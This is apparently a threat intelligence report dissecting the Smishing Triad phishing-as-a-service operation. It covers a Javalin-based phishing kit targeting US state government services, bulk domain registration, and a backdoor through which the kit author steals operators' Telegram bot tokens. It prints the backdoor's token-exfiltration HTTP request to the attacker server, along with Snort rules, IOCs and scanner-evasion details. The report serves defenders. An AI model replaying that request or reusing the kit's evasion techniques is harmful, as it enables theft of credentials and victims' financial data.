Inside the Smishing Triad: Dissecting a Javalin-Based PhaaS Operation Targeting US Government Services
Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence
TL;DR
A Chinese-origin phishing-as-a-service (PhaaS) operation known as the Smishing Triad continues to run at full scale despite Google's November 2025 RICO lawsuit. Our investigation mapped four distinct server nodes, 61 campaign domains registered over 28 days, and uncovered a novel Javalin/Kotlin-based phishing kit that represents a significant departure from the group's documented PHP infrastructure. Most critically, we confirmed a live backdoor through which the kit author siphons Telegram bot tokens from every operator who deploys the kit, granting him universal access to all stolen victim data across the entire operation.
The Kit Author is Backdooring His Own Customers
The most consequential finding in this investigation is not the phishing infrastructure itself -- it is what the kit author does to the operators who pay to use it.
Wang Duo Yu, the developer behind the "Lighthouse" phishing kit and the Smishing Triad's core tooling, embeds an obfuscated backdoor in the JQ.js file distributed with every kit deployment. This backdoor silently exfiltrates the operator's Telegram bot token -- the same token used to receive stolen victim data -- to a server controlled exclusively by Wang Duo Yu.
The token theft server sits at 102.165.14.4 (DuckDNS hostname: telegrambotcheck.duckdns.org), running a Python Twisted web application (TwistedWeb/24.3.0) on a Windows machine. The exfiltration protocol is straightforward:
POST /receive_token HTTP/1.1
Host: 102.165.14.4:5000
Content-Type: application/x-www-form-urlencoded

token={OPERATOR_BOT_TOKEN}&referrer=loco
The server validates submitted tokens against the Telegram Bot API before accepting them. Invalid or malformed tokens are rejected with "Invalid token or missing referrer." -- meaning Wang Duo Yu only stores confirmed-valid bot tokens. The referrer=loco parameter acts as a hardcoded authentication check; other values are rejected.
The implication is severe: every victim who enters their credit card number, SSN, or OTP code into any Smishing Triad phishing page -- regardless of which operator deployed it -- has their data accessible to Wang Duo Yu personally. With 4,400+ Telegram subscribers and a claimed 300+ "front desk staff" operating worldwide, the volume of compromised tokens (and by extension, compromised victim data) is substantial.
The token theft server exposes additional attack surface: RDP on port 3389, WinRM on ports 5985 and 47001, and RPC on port 135. A second Windows host at 102.165.14.2 in the same /24 range (NetBIOS hostname: WIN-LM92I1KCNUP) runs a service on port 8500, suggesting a broader operational footprint within this IPXO-leased IP block.
A New Generation of Kit: Javalin Replaces PHP
Previous public reporting on the Smishing Triad has consistently documented PHP-based kits with client-side Telegram API calls embedded in JavaScript. The infrastructure we investigated runs something different entirely.
Server Stack
The primary phishing server at 47.245.93.160 (Alibaba Cloud, AS45102, Singapore) runs a Javalin framework application on Jetty, fronted by nginx as a reverse proxy. Javalin is a lightweight web framework for Java and Kotlin, rarely seen in phishing operations. The server leaked the name of its Jetty servlet:
io.javalin.jetty.JavalinJettyServlet-3ba0ae41
The class name is the durable part of this fingerprint: io.javalin.jetty.JavalinJettyServlet identifies a Javalin application whose Jetty error page exposes the servlet name, and a phishing host that exposes it deserves attention. The -3ba0ae41 suffix should not be read as a build or kit-version identifier. It is Jetty's default ServletHolder name, the class name followed by the hex identity hash of the holder object, which is assigned when the JVM creates the holder and changes when the process restarts. A match on the full string therefore indicates the same running instance (or a capture from the same uptime window), not the same compiled kit; attribute additional hosts on the combination of this servlet name, the Host-routing behavior described below, and the TLS and SSH artifacts listed in the IOCs.
Host-Based Campaign Routing
The Javalin application uses the HTTP Host header to route victims to the correct phishing page. Each campaign domain maps to a specific state-targeted phishing template via a database lookup. The server returns a 404 with a zero-byte body when no campaign matches the requested Host header, and a 200 with a zero-byte body for requests that carry no Host header at all. A scanner that requests / without a live campaign hostname therefore receives an empty response and never sees phishing content, which keeps the server out of mass-scan datasets; Shodan, for instance, indexes only port 22 (OpenSSH 9.6p1) on this IP.
Admin Panel
The kit exposes a WebSocket-based admin panel at /console/, protected by what appears to be IP-based whitelisting rather than credential-based authentication. All tested authentication methods -- HTTP Basic, Bearer tokens, cookies, query parameters -- return 401 Unauthorized identically, suggesting the rejection occurs in a Javalin before() filter that checks the source IP before any authentication logic executes.
Subpaths including /console/login, /console/api, /console/ws, and /console/auth all return 400 Bad Request, consistent with a full administrative application behind the access control layer. Several additional endpoints (/msg, /message, /notify, /hook, /wh, /gate, /gateway) return 404 responses with non-zero body sizes (27-32 bytes), distinguishing them from undefined routes. These are likely disabled or dormant notification and webhook endpoints within the Javalin router.
Server-Side Exfiltration
The shift to Javalin enables a critical operational improvement: server-side data exfiltration. Unlike PHP kits where Telegram bot tokens are often extractable from client-side JavaScript or DOM inspection, the Javalin server calls the Telegram Bot API directly from the backend. Stolen card data, PII, and OTP codes are formatted and sent via api.telegram.org/bot{TOKEN}/sendMessage entirely server-side, so the token cannot be recovered from the client; it is only reachable through the application source, the server itself, or its outbound traffic.
Domain Infrastructure at Scale
Registration Velocity
During our 28-day observation window (February 4 -- March 3, 2026), we tracked 61 unique domains resolving to the target IP. All were registered through Gname.com Pte. Ltd. (IANA ID 1923), a Singapore-based registrar consistently observed in Smishing Triad operations.
Batch registration evidence from March 2 illustrates the automation:
| Domain | Registered | Delta |
|---|---|---|
| gov-jksr.bond | 2026-03-02T11:26:17.0Z | -- |
| gov-jkas.bond | 2026-03-02T11:26:19.0Z | +2 seconds |
| gov-jkjk.bond | 2026-03-02T11:26:21.0Z | +2 seconds |
| gov-jkjvb.bond | 2026-03-02T11:26:21.0Z | same second |
| gov-jkqe.bond | 2026-03-02T11:26:21.0Z | same second |
Five domains in four seconds, all via Gname.com's API. Nameserver pairs (A{N}.SHARE-DNS.COM / B{N}.SHARE-DNS.NET) are assigned sequentially but all resolve to the same Cloudflare IP (172.64.53.25), making the numbering cosmetic.
Campaign Phases
The 61 domains fell into five distinct campaign phases by targeting pattern:
| Phase | Dates | Targets | Domains | TLDs |
|---|---|---|---|---|
| Phase 1 | Feb 4--9 | Vehicle registration, Massachusetts | 15 | .cc, .bond |
| Phase 2 | Feb 10--12 | Massachusetts, New Mexico, Vehicle | 12 | .bond |
| Phase 3 | Feb 13--18 | Massachusetts, New Mexico, Tennessee, Vehicle | 25 | .bond, .cc |
| Phase 4 | Feb 26--28 | Toll roads (ExpressLane), Missouri | 3 | .bond |
| Phase 5 | Mar 2--3 | Georgia, Minnesota, Texas | 5 | .bond |
Massachusetts was the most heavily targeted state with 27 domains across the observation period. The operation also impersonated California, Hawaii, New Mexico, Tennessee, Missouri, Georgia, Minnesota, and Texas government services, as well as generic vehicle registration and toll road (ExpressLane) portals.
Wildcard DNS and TLS Automation
All campaign domains use wildcard DNS (*.gov-{random}.bond resolves to 47.245.93.160), allowing the operator to target any US state with a simple subdomain without additional DNS configuration. TLS certificates are provisioned automatically via Let's Encrypt R13 for each active campaign subdomain, with observed certificates for ca.gov-bed.bond, mn.gov-jksr.bond, and tx.gov-jkas.bond.
Domain lifespan is consistently 2-7 days before registrar suspension (serverHold) or DNS removal (NXDOMAIN). At time of investigation, 5 domains remained DNS-active while approximately 56 had been suspended.
SMS Distribution: Oak-Tel / Carrie SMS
Smishing messages are distributed via the Oak-Tel platform (also branded "Carrie SMS"), registered at oak-tel.com through Alibaba Cloud's HiChina registrar. The domain was created on 2024-02-20 and remains DNS-active, though the web interface is unreachable from external networks -- likely geo-restricted or accessible only via an internal API.
An Indonesian operator contact number (+62 853 59885180) is associated with the platform, consistent with the Smishing Triad's documented use of Southeast Asian infrastructure for SMS delivery. Victims receive messages impersonating toll road authorities, DMVs, or state government agencies, with links formatted as https://{state}.gov-{random}.bond/?var={tracking_id}.
MITRE ATT&CK Mapping
| Technique ID | Technique | Application |
|---|---|---|
| T1566.002 | Phishing: Spearphishing Link | SMS messages with malicious URLs to state-impersonating domains |
| T1583.001 | Acquire Infrastructure: Domains | Automated bulk registration of 61+ domains via Gname.com API |
| T1583.003 | Acquire Infrastructure: Virtual Private Server | Alibaba Cloud Singapore VPS, IPXO-leased Windows server |
| T1585.002 | Establish Accounts: Email Accounts | Singapore-based registrar accounts for domain procurement |
| T1608.005 | Stage Capabilities: Link Target | State-targeted phishing pages with multi-stage data collection |
| T1036.005 | Masquerading: Match Legitimate Name or Location | gov-*.bond domains with US state abbreviation subdomains |
| T1567 | Exfiltration Over Web Service | Telegram Bot API used for real-time exfiltration of stolen data |
| T1199 | Trusted Relationship | Kit author backdoor exploits trust relationship with kit operators |
Google RICO Lawsuit: Disrupted but Not Dismantled
In November 2025, Google filed a RICO lawsuit in the U.S. District Court, Southern District of New York, against 25 unnamed individuals behind the Lighthouse kit and Smishing Triad operations. The legal action cited violations of the Racketeer Influenced and Corrupt Organizations Act, the Lanham Act, and the Computer Fraud and Abuse Act.
Google claimed the operation was "shut down" on November 14, 2025, and several Telegram channels were taken down. Silent Push confirmed, however, that many websites remained active using Lighthouse kit code. Our investigation shows the operation fully active as of March 2026, with new domains registered daily and all server infrastructure operational. Updated kit pricing ranges from $88/week to $1,588/year, up from previously reported $20--$50 tiers.
Defensive Recommendations
Network-Level Controls
- Block phishing server IP: Add 47.245.93.160 to firewall deny lists and threat intelligence feeds.
- Block token theft server: Deny all traffic to/from 102.165.14.4 and telegrambotcheck.duckdns.org.
- DNS sinkhole: Implement regex-based DNS blocking for patterns matching *.gov-*.bond, *.gov-*.top, *.gov-*.vip, and vehicle.gov*.cc.
- TLS inspection: Alert on connections where the SNI or certificate CN matches gov-{chars}.bond patterns. Treat the Let's Encrypt R13 issuer as corroboration rather than a required condition: Let's Encrypt rotates its intermediates, so the domain pattern is the durable part of the signal.
Detection Rules
Deploy the following Snort/Suricata signatures:
alert tls any any -> 47.245.93.160 443 (msg:"SMISHING-TRIAD Phishing Server TLS"; \
tls.sni; content:".gov-"; content:".bond"; sid:2026030301; rev:1;)
alert http any any -> 102.165.14.4 5000 (msg:"SMISHING-TRIAD Token Theft POST"; \
content:"POST"; http_method; content:"/receive_token"; http_uri; \
content:"referrer=loco"; http_client_body; sid:2026030302; rev:1;)
alert dns any any -> any any (msg:"SMISHING-TRIAD Domain Pattern"; \
dns.query; pcre:"/[a-z]+\.gov-[a-z0-9]+\.(bond|top|vip|sbs|cfd|cc)/"; \
sid:2026030304; rev:1;)
Threat Hunting
- Scan for the Javalin servlet name (io.javalin.jetty.JavalinJettyServlet, observed here as JavalinJettyServlet-3ba0ae41) in Jetty error pages across internet-facing hosts to identify additional kit deployments. The hex suffix is regenerated whenever the process restarts, so pivot on the class name and confirm candidates by their Host-header routing behavior.
- Monitor Certificate Transparency logs for new gov-*.bond issuances, using the issuer (Let's Encrypt R13 at the time of investigation) as corroboration.
- Track Gname.com (IANA ID 1923) bulk registrations in .bond and .cc TLDs with share-dns nameservers.
- Pivot on SSH key fingerprints (RSA: SHA256:sMcz7nc/35hazyOKVuJ4KXyDLS23XMwzQ1j+/vk8zS4) to identify related infrastructure.
Abuse Reporting
| Entity | Contact | Purpose |
|---|---|---|
| Alibaba Cloud | DomainAbuse@service.aliyun.com | Hosting provider for phishing server |
| Gname.com | complaint@gname.com | Domain registrar |
| IPXO | abuse@ipxo.com | IP lease provider for token theft server |
| Telegram | abuse@telegram.org | Report accounts @wangduoyu0 (ID: 686449807), @laowang_notice |
| FBI IC3 | ic3.gov | US-targeted financial fraud |
Indicators of Compromise
Network Infrastructure
| Type | Indicator | Context |
|---|---|---|
| IPv4 | 47.245.93.160 | Primary phishing server (Alibaba Cloud SG, AS45102) |
| IPv4 | 102.165.14.4 | Token theft backdoor server (IPXO/Windows) |
| IPv4 | 102.165.14.2 | Related Windows host (NetBIOS: WIN-LM92I1KCNUP) |
| ASN | AS45102 | Alibaba (US) Technology Co., Ltd. |
| ASN | AS397423 | Tier.Net / IPXO (token theft server) |
Domains (Active at Time of Investigation)
| Domain | Target | Registration Date |
|---|---|---|
| gov-jksr.bond | Minnesota (wildcard) | 2026-03-02 |
| gov-jkas.bond | Texas (wildcard) | 2026-03-02 |
| gov-jkjk.bond | Georgia (wildcard) | 2026-03-02 |
| gov-jkjvb.bond | Georgia (wildcard) | 2026-03-02 |
| gov-jkqe.bond | Georgia (wildcard) | 2026-03-02 |
| telegrambotcheck.duckdns.org | Token theft C2 | Dynamic DNS |
| oak-tel.com | SMS distribution platform | 2024-02-20 |
Domains (Suspended / Historical -- Partial List)
| Domain | Target | TLD |
|---|---|---|
| gov-bed.bond | California / Hawaii | .bond |
| lxhjieyi.online | Generic | .online |
| expresslane.bdxez.bond | Toll roads | .bond |
| gov-umn.bond | Missouri | .bond |
| gov-lvf.bond | Missouri | .bond |
| appexpress.top | Historical C2 (Lighthouse dev) | .top |
TLS Certificates
| Subject CN | Serial | SHA-256 Fingerprint | Issuer |
|---|---|---|---|
| ca.gov-bed.bond | 0604386D53DFB576F34FDF7F3655951ACB96 | 82:C1:FF:3E:57:50:A0:4F:2F:97:... | Let's Encrypt R13 |
SSH Fingerprints (47.245.93.160)
| Algorithm | Fingerprint |
|---|---|
| RSA | SHA256:sMcz7nc/35hazyOKVuJ4KXyDLS23XMwzQ1j+/vk8zS4 |
| ECDSA | SHA256:/3UROuQ4EYAhxUEtkPXxySb6DzjzosagPxWfaoISERg |
| ED25519 | SHA256:+mbJ2jL339vk6o/BU8Fhs4OC8mW039G3O8fTituGo2Q |
Servlet Fingerprint
| Fingerprint | Framework |
|---|---|
| JavalinJettyServlet-3ba0ae41 | Javalin on Jetty (Java/Kotlin phishing kit); the hex suffix is Jetty's per-process identity hash, so match on the class name |
Threat Actor Identifiers
| Identifier | Value |
|---|---|
| Telegram User ID | 686449807 |
| Telegram Handle | @wangduoyu0 |
| Personal Handle | @wangduofish |
| Notice Channel | @laowang_notice (prev: @dy_tongbu) |
| Email | ceshi@gmail.com |
| Kit Name | Lighthouse |
| PRODAFT Tracking | LARVA-241 |
Domain Pattern Detection (Regex)
# State government impersonation
^[a-z]{2,10}\.gov-[a-z0-9]{2,5}\.(bond|top|vip|sbs|cfd|online|xin|cc)$
# Vehicle registration impersonation
^vehicle\.gov[a-z0-9]{2,4}\.(cc|bond)$
# Toll road impersonation
^expresslane\.[a-z0-9]{3,6}\.(bond|top)$
Conclusion
The Smishing Triad remains one of the most prolific phishing-as-a-service operations in the world, and the Google RICO lawsuit has clearly failed to achieve lasting disruption. Our investigation reveals an operation that is not merely surviving but evolving: the migration from PHP to a Javalin/Kotlin stack with server-side exfiltration represents a deliberate effort to harden the kit against the kind of client-side analysis that has historically enabled rapid takedowns.
The token theft backdoor is the most operationally significant finding. Wang Duo Yu has constructed a system where every operator who pays for the Lighthouse kit unknowingly surrenders their Telegram bot token, granting the kit author a panoptic view of all stolen data across all deployments globally. This "scammer scamming scammers" dynamic complicates traditional threat modeling -- the kit author is simultaneously a tool vendor, a silent participant in every campaign, and a single point of compromise for the entire ecosystem.
The operational tempo speaks for itself: 61 domains in 28 days on a single IP, five domains registered in four seconds, wildcard DNS enabling instant targeting of any US state, and automated Let's Encrypt provisioning ensuring valid HTTPS on every campaign domain within minutes of registration. At the reported global scale of 25,000 active domains per 8-day window across 121+ countries, the Smishing Triad infrastructure represents an industrial-grade fraud operation that demands coordinated international law enforcement response and aggressive registrar-level intervention.
Defenders should prioritize deploying the detection signatures and IOCs documented here, monitor Certificate Transparency logs for the domain patterns identified, and report active infrastructure to the abuse contacts listed. The Javalin servlet name io.javalin.jetty.JavalinJettyServlet is a useful pivot for identifying additional kit deployments that have not yet been publicly documented; expect the -3ba0ae41 suffix to match only while the observed instance keeps running, and confirm candidates by their Host-routing behavior.
Breakglass Intelligence | intel.breakglass.tech Investigation conducted March 2--8, 2026